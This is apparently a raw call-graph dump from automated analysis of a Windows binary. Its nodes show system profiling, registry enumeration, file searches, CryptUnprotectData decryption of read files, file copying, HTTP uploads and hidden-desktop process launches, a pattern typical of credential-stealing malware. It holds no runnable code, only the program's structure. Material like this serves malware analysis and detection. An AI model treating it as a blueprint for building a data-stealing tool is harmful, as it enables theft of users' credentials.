13327->13331 13328->13326 13328->13331 13329 412ec0 strtok_s 13330 412f4d 13329->13330 13329->13331 13330->13184 13331->13184 13331->13329 13331->13336 13332 413010 strtok_s 13333 4132d3 13332->13333 13332->13336 13333->13184 13334 413360 strtok_s 13333->13334 13334->13333 13335 4134f6 13334->13335 13335->13184 13336->13332 13336->13333 13436 410530 13337->13436 13339 412c59 strtok_s 13340 412d34 13339->13340 13341 412c74 13339->13341 13340->13188 13342 412ca5 strtok_s 13341->13342 13342->13340 13342->13341 13344 413528 13343->13344 13437 411120 RegOpenKeyExA 13344->13437 13346 413612 13347 410700 4 API calls 13346->13347 13348 41366b 13347->13348 13349 410540 5 API calls 13348->13349 13350 4136c8 13349->13350 13441 411cc0 13350->13441 13352 41372c 13445 4107c0 13352->13445 13354 4137c0 13453 4108e0 GetProcessHeap HeapAlloc GetComputerNameA 13354->13453 13356 4138cf 13454 4108b0 GetProcessHeap HeapAlloc GetUserNameA 13356->13454 13358 413924 13455 4109f0 13358->13455 13360 4139d7 13463 410990 13360->13463 13362 413a88 13467 410b30 13362->13467 13364 413af9 13472 410be0 13364->13472 13366 413b4e 13476 410ba0 GetSystemInfo 13366->13476 13368 413ba3 13478 410cb0 13368->13478 13370 413bf8 13483 410fe0 13370->13483 13372 413cab 13488 410d80 13372->13488 13374 413d0d 13375 410d80 6 API calls 13374->13375 13376 413d37 13375->13376 13498 413e50 13376->13498 13378 413e0f 13378->13190 13380 40e806 13379->13380 13387 40e456 13379->13387 13849 40d9c0 memset memset memset memset RegOpenKeyExA 13380->13849 13382 40e86b 13863 40de80 13382->13863 13385 40ec76 13387->13380 13811 40b0f0 13387->13811 13822 40b4e0 13387->13822 13840 40cdf0 13387->13840 13388 40b0f0 324 API calls 13391 40e8c5 13388->13391 13390 40cdf0 38 API calls 13390->13391 13391->13385 13391->13388 13391->13390 13392 40b4e0 325 API calls 13391->13392 13392->13391 13394 416930 13393->13394 13403 404280 13394->13403 13396 416943 13396->13254 13398 4169dd 13397->13398 13399 404280 8 API calls 13398->13399 13400 416a04 13399->13400 13402 416a58 13400->13402 13419 4115b0 13400->13419 13404 4042a9 13403->13404 13415 402790 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 13404->13415 13406 4042b3 13407 4042cf InternetOpenA 13406->13407 13408 4042fa 13407->13408 13409 404302 InternetConnectA 13408->13409 13412 404444 13408->13412 13410 40433b 13409->13410 13409->13412 13411 40438d HttpSendRequestA 13410->13411 13410->13412 13414 4043b9 13411->13414 13412->13396 13413 4043f0 InternetReadFile 13413->13412 13413->13414 13414->13412 13414->13413 13416 4028e9 13415->13416 13417 4028f5 InternetCrackUrlA 13416->13417 13418 402903 13417->13418 13418->13406 13420 4115c2 13419->13420 13421 4115e2 13419->13421 13420->13421 13422 4115ce LocalAlloc 13420->13422 13421->13402 13422->13421 13424 410720 13423->13424 13426 41079e 13423->13426 13425 410730 memset 13424->13425 13427 410754 13425->13427 13426->13265 13428 411e60 2 API calls 13427->13428 13429 410761 13428->13429 13429->13426 13431 411e96 13430->13431 13431->13267 13433 4077b8 13432->13433 13433->13294 13434->13310 13435->13323 13436->13339 13438 4111d5 CharToOemA 13437->13438 13439 4111b8 RegQueryValueExA 13437->13439 13438->13346 13439->13438 13442 411ce3 13441->13442 13443 411ce7 K32GetModuleFileNameExA 13442->13443 13444 411d01 13442->13444 13443->13444 13444->13352 13446 4107da RegOpenKeyExA 13445->13446 13448 410824 RegQueryValueExA 13446->13448 13449 41083d 13446->13449 13448->13449 13450 410890 13449->13450 13451 41085b RegOpenKeyExA 13449->13451 13450->13354 13451->13450 13452 410877 RegQueryValueExA 13451->13452 13452->13450 13453->13356 13454->13358 13456 410a0d 13455->13456 13457 410a3b GetLocaleInfoA 13456->13457 13462 410b0f 13456->13462 13458 410a64 13457->13458 13505 411270 13458->13505 13460 410a84 13461 411270 memset 13460->13461 13460->13462 13461->13460 13462->13360 13464 4109a3 GetTimeZoneInformation 13463->13464 13466 4109bd 13464->13466 13466->13362 13468 410b48 RegOpenKeyExA 13467->13468 13470 410b72 RegQueryValueExA 13468->13470 13471 410b8b 13468->13471 13470->13471 13471->13364 13473 410c12 GetLogicalProcessorInformationEx 13472->13473 13474 410c36 13473->13474 13475 410c00 13473->13475 13474->13366 13475->13473 13475->13474 13477 410bc4 13476->13477 13477->13368 13479 410cc7 13478->13479 13480 411270 memset 13479->13480 13481 410cdf GlobalMemoryStatusEx 13480->13481 13482 410d15 13481->13482 13482->13370 13508 4101c0 13483->13508 13485 410ffd CreateToolhelp32Snapshot Process32First 13486 411021 Process32Next 13485->13486 13487 411031 13485->13487 13486->13487 13487->13372 13489 4101c0 13488->13489 13490 410da4 RegOpenKeyExA 13489->13490 13491 410ddc RegEnumKeyExA 13490->13491 13493 410fb1 13490->13493 13491->13493 13497 410e1e 13491->13497 13492 410e8f RegOpenKeyExA 13492->13493 13494 410eae RegQueryValueExA 13492->13494 13493->13374 13494->13497 13495 410e3a RegEnumKeyExA 13495->13493 13495->13497 13496 410f39 RegQueryValueExA 13496->13497 13497->13492 13497->13495 13497->13496 13499 413e69 13498->13499 13500 413f0a Sleep 13499->13500 13502 413f17 13499->13502 13500->13499 13501 413f5a CreateThread WaitForSingleObject 13504 413f8b 13501->13504 13772 416ea0 13501->13772 13502->13501 13510 41e4c0 13502->13510 13504->13378 13506 411289 13505->13506 13507 411278 memset 13505->13507 13506->13460 13507->13506 13509 4101ce 13508->13509 13509->13485 13511 41e4f0 13510->13511 13512 41e4c8 13510->13512 13511->13501 13513 41e4e8 13512->13513 13515 41dd60 13512->13515 13513->13501 13516 41dd75 13515->13516 13569 41dd82 13515->13569 13517 41dd91 lstrcpyA 13516->13517 13516->13569 13518 41ddd0 13517->13518 13517->13569 13519 41de32 strlen 13518->13519 13520 41de09 13518->13520 13522 41de17 13519->13522 13572 41d0c0 lstrlenA 13520->13572 13523 41def3 13522->13523 13524 41de6c 13522->13524 13527 41d590 14 API calls 13523->13527 13525 41de75 13524->13525 13526 41df04 13524->13526 13528 41de7e 13525->13528 13530 41df1f 13525->13530 13592 41d710 13526->13592 13534 41df02 13527->13534 13531 41dea8 CreateFileA 13528->13531 13528->13569 13530->13569 13596 41d850 GetLocalTime SystemTimeToFileTime FileTimeToSystemTime 13530->13596 13533 41ded5 13531->13533 13531->13569 13583 41d590 13533->13583 13536 41df42 lstrcpyA lstrcpyA lstrlenA 13534->13536 13534->13569 13538 41df8c lstrcpyA 13536->13538 13539 41df7c lstrcatA 13536->13539 13598 41e500 13538->13598 13539->13538 13540 41dee5 CloseHandle 13540->13569 13543 41e0c9 13663 41da10 13543->13663 13544 41e0da 13546 41e0f3 13544->13546 13547 41e102 13544->13547 13548 41da10 CloseHandle 13546->13548 13549 41e198 12 API calls 13547->13549 13550 41e17f GetTickCount GetDesktopWindow srand 13547->13550 13548->13569 13552 41e239 13549->13552 13550->13549 13551 41e2c7 13553 41e303 13551->13553 13554 41e2f7 13551->13554 13552->13551 13667 41d3f0 13552->13667 13557 41e2ff 13553->13557 13690 41dd10 13553->13690 13679 41da50 13554->13679 13559 41da10 CloseHandle 13557->13559 13561 41e339 13559->13561 13560 41e391 13560->13569 13695 41e7b0 13560->13695 13561->13560 13562 41e43a 13561->13562 13561->13569 13728 41d530 13562->13728 13565 41e46a 13567 41e500 5 API calls 13565->13567 13565->13569 13566 41e3d8 ??_U@YAPAXI memcpy ??2@YAPAXI memcpy 13566->13569 13568 41e475 13567->13568 13568->13569 13570 41d530 SetFilePointer 13568->13570 13569->13513 13571 41e3bf 13570->13571 13571->13566 13571->13569 13574 41d0d5 13572->13574 13573 41d0f7 StrCmpCA 13575 41d17c 13573->13575 13576 41d109 StrCmpCA 13573->13576 13574->13573 13574->13575 13575->13522 13576->13575 13577 41d119 StrCmpCA 13576->13577 13577->13575 13578 41d129 StrCmpCA 13577->13578 13578->13575 13579 41d139 StrCmpCA 13578->13579 13579->13575 13580 41d149 StrCmpCA 13579->13580 13580->13575 13581 41d159 StrCmpCA 13580->13581 13581->13575 13582 41d169 StrCmpCA 13581->13582 13582->13575 13584 41d5d8 SetFilePointer 13583->13584 13585 41d5cc 13583->13585 13586 41d622 GetLocalTime SystemTimeToFileTime FileTimeToSystemTime 13584->13586 13587 41d5ee 13584->13587 13585->13534 13585->13540 13590 41d6dd __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 13586->13590 13733 41d190 GetFileInformationByHandle 13587->13733 13591 41d60a SetFilePointer 13591->13585 13593 41d769 13592->13593 13595 41d813 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 13592->13595 13594 41d771 GetLocalTime SystemTimeToFileTime FileTimeToSystemTime 13593->13594 13593->13595 13594->13595 13595->13534 13597 41d919 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 13596->13597 13597->13534 13599 41d3f0 5 API calls 13598->13599 13600 41e521 13599->13600 13601 41d3f0 5 API calls 13600->13601 13602 41e530 13601->13602 13603 41d3f0 5 API calls 13602->13603 13604 41e543 13603->13604 13605 41d3f0 5 API calls 13604->13605 13606 41e552 13605->13606 13607 41d3f0 5 API calls 13606->13607 13608 41e568 13607->13608 13609 41d3f0 5 API calls 13608->13609 13610 41e57a 13609->13610 13611 41d3f0 5 API calls 13610->13611 13612 41e590 13611->13612 13613 41d3f0 5 API calls 13612->13613 13614 41e5a2 13613->13614 13615 41d3f0 5 API calls 13614->13615 13616 41e5b8 13615->13616 13617 41d3f0 5 API calls 13616->13617 13618 41e5ca 13617->13618 13619 41d3f0 5 API calls 13618->13619 13620 41e5e0 13619->13620 13621 41d3f0 5 API calls 13620->13621 13622 41e5f2 13621->13622 13623 41d3f0 5 API calls 13622->13623 13624 41e608 13623->13624 13625 41d3f0 5 API calls 13624->13625 13626 41e61a 13625->13626 13627 41d3f0 5 API calls 13626->13627 13628 41e630 13627->13628 13629 41d3f0 5 API calls 13628->13629 13630 41e642 13629->13630 13631 41d3f0 5 API calls 13630->13631 13632 41e658 13631->13632 13633 41d3f0 5 API calls 13632->13633 13634 41e66a 13633->13634 13635 41d3f0 5 API calls 13634->13635 13636 41e680 13635->13636 13637 41d3f0 5 API calls 13636->13637 13638 41e692 13637->13638 13639 41d3f0 5 API calls 13638->13639 13640 41e6a8 13639->13640 13641 41d3f0 5 API calls 13640->13641 13642 41e6ba 13641->13642 13643 41d3f0 5 API calls 13642->13643 13644 41e6d0 13643->13644 13645 41d3f0 5 API calls 13644->13645 13646 41e6e2 13645->13646 13647 41d3f0 5 API calls 13646->13647 13648 41e6f8 13647->13648 13649 41d3f0 5 API calls 13648->13649 13650 41e70a 13649->13650 13651 41d3f0 5 API calls 13650->13651 13652 41e720 13651->13652 13653 41d3f0 5 API calls 13652->13653 13654 41e732 13653->13654 13655 41d3f0 5 API calls 13654->13655 13656 41e748 13655->13656 13657 41d3f0 5 API calls 13656->13657 13658 41e75a 13657->13658 13659 41e770 13658->13659 13660 41d3f0 5 API calls 13658->13660 13661 41e0c5 13659->13661 13662 41d3f0 5 API calls 13659->13662 13660->13659 13661->13543 13661->13544 13662->13661 13664 41da2b 13663->13664 13665 41da1d 13663->13665 13664->13569 13665->13664 13666 41da24 CloseHandle 13665->13666 13666->13664 13668 41d40b 13667->13668 13678 41d44b 13667->13678 13669 41d422 13668->13669 13674 41d417 ??_V@YAXPAX 13668->13674 13675 41d426 ??_U@YAPAXI 13669->13675 13676 41d43c memcpy 13669->13676 13670 41d4e8 13672 41d4ef WriteFile 13670->13672 13673 41d505 13670->13673 13671 41d4cb 13671->13673 13677 41d4d6 memcpy 13671->13677 13672->13673 13673->13551 13674->13675 13675->13676 13676->13678 13677->13673 13678->13670 13678->13671 13680 41da65 ??2@YAPAXI memset 13679->13680 13681 41db38 13679->13681 13680->13681 13741 419330 13681->13741 13683 41dbec memset 13686 41dc5c 13683->13686 13685 41dc99 13751 41c940 13685->13751 13686->13685 13747 41c020 13686->13747 13692 41dd20 13690->13692 13693 41dd44 13692->13693 13694 41d3f0 5 API calls 13692->13694 13766 41d970 13692->13766 13693->13557 13694->13692 13696 41d3f0 5 API calls 13695->13696 13697 41e7d1 13696->13697 13698 41d3f0 5 API calls 13697->13698 13699 41e7e0 13698->13699 13700 41d3f0 5 API calls 13699->13700 13701 41e7f3 13700->13701 13702 41d3f0 5 API calls 13701->13702 13703 41e802 13702->13703 13704 41d3f0 5 API calls 13703->13704 13705 41e818 13704->13705 13706 41d3f0 5 API calls 13705->13706 13707 41e82a 13706->13707 13708 41d3f0 5 API calls 13707->13708 13709 41e840 13708->13709 13710 41d3f0 5 API calls 13709->13710 13711 41e852 13710->13711 13712 41d3f0 5 API calls 13711->13712 13713 41e868 13712->13713 13714 41d3f0 5 API calls 13713->13714 13715 41e87a 13714->13715 13716 41d3f0 5 API calls 13715->13716 13717 41e890 13716->13717 13718 41d3f0 5 API calls 13717->13718 13719 41e8a2 13718->13719 13720 41d3f0 5 API calls 13719->13720 13721 41e8b8 13720->13721 13722 41d3f0 5 API calls 13721->13722 13723 41e8ca 13722->13723 13724 41d3f0 5 API calls 13723->13724 13725 41e8dd 13724->13725 13726 41d3f0 5 API calls 13725->13726 13727 41e8ee 13726->13727 13727->13571 13729 41d536 13728->13729 13730 41d54d 13728->13730 13731 41d540 13729->13731 13732 41d560 SetFilePointer 13729->13732 13730->13565 13731->13565 13732->13565 13734 41d29a 13733->13734 13735 41d1af GetFileSize 13733->13735 13734->13585 13734->13591 13736 41d1f6 SetFilePointer ReadFile SetFilePointer ReadFile 13735->13736 13740 41d281 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 13735->13740 13737 41d243 13736->13737 13736->13740 13738 41d24e SetFilePointer ReadFile 13737->13738 13737->13740 13738->13740 13739 41d330 FileTimeToSystemTime 13739->13734 13740->13734 13740->13739 13742 41936f 13741->13742 13746 41955c 13741->13746 13743 419380 memset memset 13742->13743 13743->13743 13744 4193f8 13743->13744 13745 419530 memset 13744->13745 13744->13746 13745->13744 13746->13683 13750 41c040 13747->13750 13748 41c1ca 13748->13685 13749 41c072 memcpy 13749->13750 13750->13748 13750->13749 13756 41c951 13751->13756 13752 41cecd 13758 41b0b0 13752->13758 13754 41cf57 13754->13557 13755 41c020 memcpy 13755->13756 13756->13752 13756->13755 13757 41b0b0 memcpy 13756->13757 13757->13756 13759 41b0e3 13758->13759 13761 41b394 13759->13761 13762 41b5c0 13759->13762 13761->13754 13763 41b5d2 13762->13763 13764 41b6c7 memcpy 13763->13764 13765 41b695 13763->13765 13764->13765 13765->13761 13767 41d9c7 13766->13767 13768 41d989 13766->13768 13770 41d9ce ReadFile 13767->13770 13771 41d9c0 13767->13771 13769 41d99b memcpy 13768->13769 13768->13771 13769->13771 13770->13771 13771->13692 13775 416ebf 13772->13775 13773 416f9e 13775->13773 13776 416f81 13775->13776 13778 403090 13775->13778 13777 411270 memset 13776->13777 13777->13773 13779 4030b2 13778->13779 13780 402790 4 API calls 13779->13780 13781 4030d2 13780->13781 13805 4116b0 13781->13805 13783 403103 13784 4116b0 2 API calls 13783->13784 13786 40312e 13784->13786 13785 4113b0 lstrlenA 13788 4031b9 13785->13788 13786->13785 13787 403865 13786->13787 13787->13775 13788->13787 13789 403672 RtlAllocateHeap 13788->13789 13790 40368a 13789->13790 13791 40369d memcpy 13790->13791 13792 4036bb 13791->13792 13793 4036be memcpy 13792->13793 13794 4036e0 13793->13794 13795 403705 memcpy 13794->13795 13796 403720 13795->13796 13797 403744 HttpSendRequestA 13796->13797 13798 403756 Sleep 13797->13798 13801 403780 13797->13801 13799 403770 13798->13799 13800 40376b 13798->13800 13799->13787 13800->13796 13800->13799 13801->13787 13802 4037c3 InternetReadFile 13801->13802 13803 4037e0 13802->13803 13804 403856 InternetCloseHandle 13803->13804 13804->13787 13806 4116c2 13805->13806 13810 411727 13805->13810 13807 411702 RtlAllocateHeap 13806->13807 13806->13810 13808 41170e 13807->13808 13807->13810 13809 411733 GetLastError 13808->13809 13808->13810 13809->13810 13810->13783 13812 40b108 13811->13812 13878 411520 13812->13878 13814 40b1c7 13815 40b2a0 13814->13815 13816 40b1e1 13814->13816 13819 40b298 13814->13819 13886 4078f0 13815->13886 13816->13819 13882 40af60 13816->13882 13820 40b339 13820->13819 13821 4081b0 313 API calls 13820->13821 13821->13819 13823 40b4fb 13822->13823 13824 40b51d StrCmpCA 13823->13824 13825 40b531 13824->13825 13828 40b6b3 13824->13828 13826 411520 GetFileAttributesA 13825->13826 13827 40b5f7 13826->13827 13831 40b611 13827->13831 13832 40b876 13827->13832 13836 40b86e 13827->13836 13829 411520 GetFileAttributesA 13828->13829 13830 40b7a4 13829->13830 13830->13831 13835 40b9db 13830->13835 13830->13836 13834 40af60 19 API calls 13831->13834 13831->13836 13833 4078f0 100 API calls 13832->13833 13839 40b90f 13833->13839 13834->13836 13837 4078f0 100 API calls 13835->13837 13837->13839 13839->13836 13919 4081b0 13839->13919 13841 40ce08 13840->13841 13842 411520 GetFileAttributesA 13841->13842 13843 40cec6 13842->13843 13844 40cedf 13843->13844 13845 40cfa4 13843->13845 13846 40cf9f 13843->13846 14575 40c790 13844->14575 14604 409460 13845->14604 13850 40da5f RegGetValueA 13849->13850 13853 40daa2 13849->13853 13852 40da8e 13850->13852 13862 40da89 13850->13862 13851 40dadd RegOpenKeyExA 13851->13853 13857 40daf6 13851->13857 13852->13851 13852->13862 13853->13382 13854 40dc2a RegGetValueA 13854->13857 13855 40dd12 RegGetValueA 13855->13857 13857->13854 13857->13855 13858 40db42 ??3@YAXPAX 13857->13858 13859 40dddf _invalid_parameter_noinfo_noreturn 13857->13859 13860 40dde4 13857->13860 13857->13862 14629 40d250 13857->14629 13858->13857 13859->13860 13861 413e50 93 API calls 13860->13861 13861->13862 13862->13853 13864 40de98 13863->13864 13865 4076b0 3 API calls 13864->13865 13866 40df07 13865->13866 13867 4115b0 LocalAlloc 13866->13867 13870 40e017 13866->13870 13868 40df1c 13867->13868 13869 40df24 strtok_s 13868->13869 13868->13870 13877 40df44 13869->13877 13870->13391 13871 40df8c 13872 413e50 93 API calls 13871->13872 13872->13870 13873 411e60 malloc strncpy 13876 40e0c9 13873->13876 13874 40e0a0 strtok_s 13874->13871 13874->13877 13875 40e1a2 lstrlenA 13875->13876 13876->13873 13876->13875 13876->13877 13877->13871 13877->13874 13877->13876 13897 410530 13878->13897 13880 411534 GetFileAttributesA 13881 411545 13880->13881 13881->13814 13883 40b0b0 13882->13883 13884 40af76 13882->13884 13884->13883 13898 40a5d0 13884->13898 13887 40790e 13886->13887 13911 4076b0 13887->13911 13889 40791f 13890 4115b0 LocalAlloc 13889->13890 13893 40799f 13889->13893 13891 407934 13890->13891 13892 407968 lstrlenA 13891->13892 13891->13893 13892->13893 13894 407ace CryptUnprotectData 13893->13894 13895 407bc1 lstrlenA 13893->13895 13896 413e50 93 API calls 13893->13896 13894->13893 13895->13893 13896->13893 13897->13880 13899 40a5f1 13898->13899 13900 40a63b FindFirstFileA 13899->13900 13909 40ae49 13900->13909 13910 40a64e 13900->13910 13901 402400 11 API calls 13901->13910 13902 40a731 strlen 13902->13910 13903 40a76c memcmp 13903->13910 13904 40a8ac ??3@YAXPAX 13904->13910 13905 40a6ef FindNextFileA 13905->13909 13905->13910 13906 40a85e ??3@YAXPAX 13906->13910 13907 40a92b StrCmpCA 13907->13910 13908 411520 GetFileAttributesA 13908->13910 13910->13901 13910->13902 13910->13903 13910->13904 13910->13905 13910->13906 13910->13907 13910->13908 13910->13909 13918 410530 13911->13918 13913 4076cc CreateFileA 13914 40774e 13913->13914 13915 4076fa 13913->13915 13914->13889 13915->13914 13916 407713 LocalAlloc 13915->13916 13916->13914 13917 407732 ReadFile 13916->13917 13917->13914 13918->13913 13952 410530 13919->13952 13921 4081cc ExpandEnvironmentStringsA 13922 4081e7 13921->13922 13923 408266 FindFirstFileA 13922->13923 13933 4093cb 13923->13933 13951 408279 13923->13951 13924 40830a strlen 13924->13951 13925 40833b memcmp 13925->13951 13926 402400 11 API calls 13926->13951 13927 4082b2 FindNextFileA 13927->13933 13927->13951 13928 408488 ??3@YAXPAX 13928->13951 13929 408394 strlen 13929->13951 13930 409452 _invalid_parameter_noinfo_noreturn 13931 4083c9 memcmp 13931->13951 13932 40842e ??3@YAXPAX 13932->13951 13933->13930 13934 40850f StrCmpCA 13934->13951 13935 411520 GetFileAttributesA 13935->13951 13936 4113b0 lstrlenA 13936->13951 13937 408f24 memset 13937->13951 13938 4092ad memset 13938->13951 13940 4081b0 296 API calls 13940->13951 13942 409099 CopyFileA 13942->13951 13943 408e03 CopyFileA 13943->13951 13945 4091b7 DeleteFileA 13945->13951 13946 411d20 3 API calls 13949 408c2b Sleep 13946->13949 13947 4076b0 CreateFileA LocalAlloc ReadFile 13947->13951 13948 408925 13948->13946 13948->13951 14029 411d20 13948->14029 13949->13948 13949->13951 13950 413e50 93 API calls 13950->13951 13951->13924 13951->13925 13951->13926 13951->13927 13951->13928 13951->13929 13951->13930 13951->13931 13951->13932 13951->13934 13951->13935 13951->13936 13951->13937 13951->13938 13951->13940 13951->13942 13951->13943 13951->13945 13951->13947 13951->13948 13951->13950 13953 407dd0 13951->13953 13985 407110 memcpy OpenDesktopA 13951->13985 13952->13921 13954 407deb 13953->13954 13955 4113b0 lstrlenA 13954->13955 13956 407e27 13955->13956 13957 407e89 CopyFileA 13956->13957 13958 407ec0 13957->13958 13959 407e94 13957->13959 13960 407ec8 PathFileExistsA 13958->13960 13961 411d20 3 API calls 13959->13961 13962 408097 Sleep 13960->13962 13963 407ed7 13960->13963 13964 407ea7 Sleep 13961->13964 13975 4080b9 13962->13975 13965 407edf CreateFileA 13963->13965 13964->13956 13966 407eb7 13964->13966 13967 407f10 GetFileSize 13965->13967 13978 40808a 13965->13978 13966->13958 13968 407f24 13967->13968 13969 40815a CloseHandle 13967->13969 13968->13969 13970 407f43 ReadFile 13968->13970 13969->13978 13971 408148 13970->13971 13972 407f5e 13970->13972 13971->13969 13972->13971 13973 407f6a CloseHandle 13972->13973 13974 407f7d RtlAllocateHeap 13973->13974 13979 407f97 13974->13979 13976 407dd0 96 API calls 13975->13976 13977 408143 13976->13977 13977->13978 13980 413e50 93 API calls 13979->13980 13981 408049 RtlFreeHeap 13980->13981 14033 410530 13981->14033 13984 408080 DeleteFileA 13984->13978 13986 40716c 13985->13986 13987 40714c CreateDesktopA 13985->13987 14034 407660 13986->14034 13987->13986 13989 40718b 14037 411fa0 CreateToolhelp32Snapshot Process32First 13989->14037 13992 407221 strlen 13993 40722c 13992->13993 14040 402400 13993->14040 13996 407303 CreateProcessA 13999 4074c2 13996->13999 14000 407352 Sleep 13996->14000 13997 4072bf ??3@YAXPAX 14025 4072c8 13997->14025 13998 411fa0 3 API calls 14002 40723a 13998->14002 14003 4074e1 strlen 13999->14003 14004 4074ea 13999->14004 14000->14025 14001 40764d _invalid_parameter_noinfo_noreturn 14002->13998 14007 40727b 14002->14007 14056 406fe0 14002->14056 14003->14004 14005 402400 11 API calls 14004->14005 14006 4074f6 14005->14006 14100 406b00 14006->14100 14007->13997 14007->14001 14007->14025 14009 407504 14010 407511 strlen 14009->14010 14011 40751c 14009->14011 14010->14011 14012 406b00 221 API calls 14011->14012 14013 407525 14012->14013 14014 406b00 221 API calls 14013->14014 14027 407535 14014->14027 14016 40760c 14147 412050 CreateToolhelp32Snapshot Process32First 14016->14147 14018 407614 CloseDesktop 14022 407608 14018->14022 14019 407414 strlen 14019->14025 14020 402400 11 API calls 14020->14025 14021 406fe0 263 API calls 14021->14025 14022->13951 14023 4072f0 ??3@YAXPAX 14023->14025 14024 411fa0 CreateToolhelp32Snapshot Process32First Process32Next 14024->14025 14025->13996 14025->14001 14025->14016 14025->14018 14025->14019 14025->14020 14025->14021 14025->14023 14025->14024 14065 406bc0 14025->14065 14026 4075ff ??3@YAXPAX 14026->14022 14027->14001 14027->14022 14027->14026 14028 4075fd 14027->14028 14028->14026 14030 411d2e 14029->14030 14031 411d70 GetProcessHeap HeapAlloc wsprintfW 14030->14031 14032 411dc4 14030->14032 14031->14032 14032->13948 14033->13984 14152 40f760 14034->14152 14036 40767d __stdio_common_vsnprintf_s 14036->13989 14038 411fce Process32Next 14037->14038 14039 407207 14037->14039 14038->14039 14039->13992 14039->13993 14041 402412 14040->14041 14042 402489 14040->14042 14041->14042 14048 40242a 14041->14048 14043 40248e 14042->14043 14044 4024ef 14042->14044 14045 4024a0 14043->14045 14153 402520 14043->14153 14171 402510 14044->14171 14049 4024ad memcpy 14045->14049 14052 402478 14045->14052 14051 4024e8 14048->14051 14054 402447 14048->14054 14049->14052 14168 402500 14051->14168 14052->14002 14054->14052 14055 402469 memmove 14054->14055 14055->14052 14211 407060 14056->14211 14058 406ffc FindFirstFileA 14060 407016 14058->14060 14061 407049 14058->14061 14062 407040 ??3@YAXPAX 14060->14062 14063 407059 _invalid_parameter_noinfo_noreturn 14060->14063 14064 40703e 14060->14064 14061->14002 14062->14061 14064->14062 14284 404ea0 14065->14284 14068 402400 11 API calls 14069 406c08 14068->14069 14327 4053f0 14069->14327 14070 406f37 ??3@YAXPAX 14082 406f40 14070->14082 14071 406c96 14071->14070 14073 406f70 _invalid_parameter_noinfo_noreturn 14071->14073 14077 406f35 14071->14077 14071->14082 14077->14070 14078 406c60 14079 406c63 lstrcatA 14078->14079 14080 406c8b strlen 14079->14080 14081 406c9d 14079->14081 14080->14081 14083 402400 11 API calls 14081->14083 14082->14025 14084 406cae 14083->14084 14349 4054a0 14084->14349 14086 406d09 14088 406d14 ??_U@YAPAXI 14086->14088 14097 406e0b 14086->14097 14087 406d00 ??3@YAXPAX 14087->14086 14089 406d23 14088->14089 14090 406d26 memcpy 14088->14090 14089->14090 14098 406d3f 14090->14098 14091 406e77 14091->14073 14093 406ec2 14091->14093 14094 406eb9 ??3@YAXPAX 14091->14094 14092 406e6e ??3@YAXPAX 14092->14091 14093->14071 14093->14073 14096 406efc ??3@YAXPAX 14093->14096 14094->14093 14095 406cb8 14095->14073 14095->14086 14095->14087 14096->14071 14097->14073 14097->14091 14097->14092 14099 413e50 93 API calls 14098->14099 14099->14097 14101 406b12 14100->14101 14106 406b38 14100->14106 14103 406b2a 14101->14103 14101->14106 14102 406bae 14104 402510 4 API calls 14102->14104 14107 40f390 4 API calls 14103->14107 14108 406bb5 14104->14108 14105 406b36 14105->14009 14106->14102 14106->14105 14109 406b4f 14106->14109 14107->14105 14111 404ea0 208 API calls 14108->14111 14110 406b5f 14109->14110 14112 402520 6 API calls 14109->14112 14110->14105 14113 406b6f memcpy 14110->14113 14114 406bdd 14111->14114 14112->14110 14113->14105 14115 402400 11 API calls 14114->14115 14118 406c96 14114->14118 14116 406c08 14115->14116 14119 4053f0 3 API calls 14116->14119 14117 406f37 ??3@YAXPAX 14129 406f40 14117->14129 14118->14117 14120 406f70 _invalid_parameter_noinfo_noreturn 14118->14120 14124 406f35 14118->14124 14118->14129 14121 406c16 14119->14121 14122 40ed20 11 API calls 14121->14122 14123 406c36 memset lstrcatA 14122->14123 14125 406c60 14123->14125 14126 406c63 lstrcatA 14123->14126 14124->14117 14125->14126 14127 406c8b strlen 14126->14127 14128 406c9d 14126->14128 14127->14128 14130 402400 11 API calls 14128->14130 14129->14009 14131 406cae 14130->14131 14132 4054a0 208 API calls 14131->14132 14140 406cb8 14132->14140 14133 406d09 14135 406d14 ??_U@YAPAXI 14133->14135 14146 406e0b 14133->14146 14134 406d00 ??3@YAXPAX 14134->14133 14136 406d23 14135->14136 14137 406d26 memcpy 14135->14137 14136->14137 14144 406d3f 14137->14144 14138 406e6e ??3@YAXPAX 14142 406e77 14138->14142 14139 406eb9 ??3@YAXPAX 14143 406ec2 14139->14143 14140->14120 14140->14133 14140->14134 14141 406efc ??3@YAXPAX 14141->14118 14142->14120 14142->14139 14142->14143 14143->14118 14143->14120 14143->14141 14145 413e50 93 API calls 14144->14145 14145->14146 14146->14120 14146->14138 14146->14142 14148 41207b Process32Next 14147->14148 14149 4120cd 14147->14149 14148->14149 14150 412087 14148->14150 14149->14018 14150->14149 14151 4120c2 TerminateProcess 14150->14151 14151->14150 14152->14036 14154 402534 14153->14154 14155 40260d 14154->14155 14156 40258d ??2@YAPAXI 14154->14156 14157 40256d 14154->14157 14158 402598 14154->14158 14174 41eabe 14155->14174 14156->14158 14157->14155 14161 402576 ??2@YAPAXI 14157->14161 14159 4025aa memcpy 14158->14159 14165 4025b5 14158->14165 14159->14165 14160 4025ef 14160->14045 14161->14158 14163 4025e6 ??3@YAXPAX 14163->14160 14165->14160 14165->14163 14166 402608 _invalid_parameter_noinfo_noreturn 14165->14166 14167 4025e4 14165->14167 14166->14155 14167->14163 14181 41eafb 14168->14181 14203 41eadb 14171->14203 14175 41eacc Concurrency::cancel_current_task 14174->14175 14178 41ec3e 14175->14178 14177 41eada 14179 41ec85 RaiseException 14178->14179 14180 41ec58 14178->14180 14179->14177 14180->14179 14188 41eb72 14181->14188 14184 41ec3e Concurrency::cancel_current_task RaiseException 14185 41eb1a 14184->14185 14191 41ea14 14185->14191 14194 41e9dd 14188->14194 14197 41ebbc 14191->14197 14195 41ebbc ___std_exception_copy malloc strcpy_s free 14194->14195 14196 41ea09 14195->14196 14196->14184 14198 40250a 14197->14198 14199 41ebc9 14197->14199 14199->14198 14200 41ebd9 malloc 14199->14200 14201 41ec06 free 14200->14201 14202 41ebed strcpy_s 14200->14202 14201->14198 14202->14201 14208 41eb36 14203->14208 14206 41ec3e Concurrency::cancel_current_task RaiseException 14207 41eafa 14206->14207 14209 41e9dd std::exception::exception 3 API calls 14208->14209 14210 41eaec 14209->14210 14210->14206 14212 407096 14211->14212 14213 407089 strlen 14211->14213 14214 4070a4 